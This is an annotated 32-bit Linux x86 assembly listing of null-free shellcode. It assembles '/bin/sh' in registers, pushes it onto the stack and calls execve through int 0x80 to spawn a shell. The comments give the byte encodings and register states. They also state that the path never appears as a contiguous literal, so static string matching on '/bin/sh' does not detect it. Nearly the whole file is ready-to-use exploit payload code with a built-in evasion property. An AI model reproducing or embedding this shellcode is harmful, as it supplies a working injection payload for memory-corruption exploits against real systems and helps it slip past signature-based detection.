code.asm
# Linux i386 (32-bit) sequence, Intel operand order, that assembles the string
# "/bin/sh\0" in registers, pushes it onto the stack and invokes execve through
# the legacy int 0x80 gate. The trailing comment on each line gives the encoded
# bytes and the resulting register state.
#
# Register roles at the int 0x80:
#   eax = 0x0b  syscall number (execve, per the final line)
#   ebx = pointer to the path on the stack
#   ecx = 0, edx = 0  (second and third arguments left NULL)
#
# Review notes:
#  - None of the listed encodings contains a 0x00 byte, and the path never
#    appears as a contiguous literal, so a static string match on "/bin/sh"
#    does not hit these bytes; the execve call itself is what process-execution
#    auditing observes.
#  - Nothing follows the int 0x80 in this listing, so the behaviour when
#    execve fails is not defined here.
push 16 # 6a 10 => shift count, loaded through the stack
nop # 90 => no state change; NOTE(review): purpose not evident from this file
pop ecx # 59 => $ecx = 16
xor eax, eax # 31 c0 => $eax = 0x00000000
mov al, 0x68 # b0 68 => $eax = 0x00000068 ('h')
# d3 /4 is the shift-by-CL encoding, so the count used is cl = 16.
# NOTE(review): stricter assemblers expect the operand written as cl - confirm toolchain.
shl eax, ecx # d3 e0 => $eax = 0x00680000
mov ah, 0x73 # b4 73 => $eax = 0x00687300 ('s')
mov al, 0x2f # b0 2f => $eax = 0x0068732f ("/sh\0" in little-endian byte order)
# Upper 16 bits of ebx are unknown until the shift below discards them.
mov bh, 0x6e # b7 6e => $ebx = 0x____6e__ ('n')
mov bl, 0x69 # b3 69 => $ebx = 0x____6e69 ('i')
shl ebx, ecx # d3 e3 => $ebx = 0x6e690000 (same shift-by-CL form, count 16)
mov bh, 0x62 # b7 62 => $ebx = 0x6e696200 ('b')
mov bl, 0x2f # b3 2f => $ebx = 0x6e69622f ("/bin" in little-endian byte order)
# Pushed in reverse so the two dwords read "/bin" then "/sh\0" from esp upward.
push eax # 50 => Push "/sh\0"
push ebx # 53 => Push "/bin"
xor ecx, ecx # 31 c9 => $ecx = 0 (second syscall argument)
xor edx, edx # 31 d2 => $edx = 0 (third syscall argument)
xor eax, eax # 31 c0 => $eax = 0
mov al, 0x0b # b0 0b => $eax = 0x0b (syscall number)
mov ebx, esp # 89 e3 => $ebx = pointer to "/bin/sh\0" at the top of the stack
int 0x80 # cd 80 => execve